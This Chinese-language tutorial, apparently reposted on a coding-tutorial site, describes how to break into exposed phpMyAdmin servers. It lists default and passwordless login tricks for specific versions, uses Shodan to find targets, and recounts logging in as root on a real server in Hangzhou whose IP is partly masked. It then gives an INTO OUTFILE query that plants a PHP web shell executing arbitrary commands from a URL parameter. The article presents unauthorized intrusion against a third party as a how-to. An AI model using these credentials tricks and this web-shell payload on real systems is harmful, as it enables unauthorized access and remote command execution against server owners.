今天小编就为大家分享一篇关于phpMyAdmin通过密码漏洞留后门文件,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
- 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
- 版本 2.11.3~2.11.4:用户名
'localhost'@'@"
登陆,无需密码。 - 版本 2.11.9.2:用户名
root
登陆,无需密码。
经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。
下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin
先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。
地址已手动打码。
http://121.***.*.219:80/
登陆成功(root 权限)。
接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。
SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"
点击运行,不出意外便在对方主机留下了一个名为 runme.php
的后门文件。
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对编程学习网的支持。如果你想了解更多相关内容请查看下面相关链接
织梦狗教程
本文标题为:phpMyAdmin通过密码漏洞留后门文件


基础教程推荐
猜你喜欢
- PHP实现创建一个RPC服务操作示例 2023-04-01
- PHP使用SMTP邮件服务器发送邮件示例 2022-11-16
- php中使用array_filter()函数过滤数组实例讲解 2023-05-19
- thinkPHP3.2.2框架行为扩展及demo示例 2022-11-07
- PHP删除数组中指定值的元素常用方法实例分析【4种方法】 2022-11-12
- laravel model模型定义实现开启自动管理时间created_at,updated_at 2023-03-02
- PHP数据加密方式梳理介绍 2023-07-03
- PHP实现生成数据字典功能示例 2022-10-18
- TP5 连接多个数据库及使用方法 2023-08-30
- TP5(thinkPHP5框架)基于bootstrap实现的单图上传插件用法示例 2023-01-19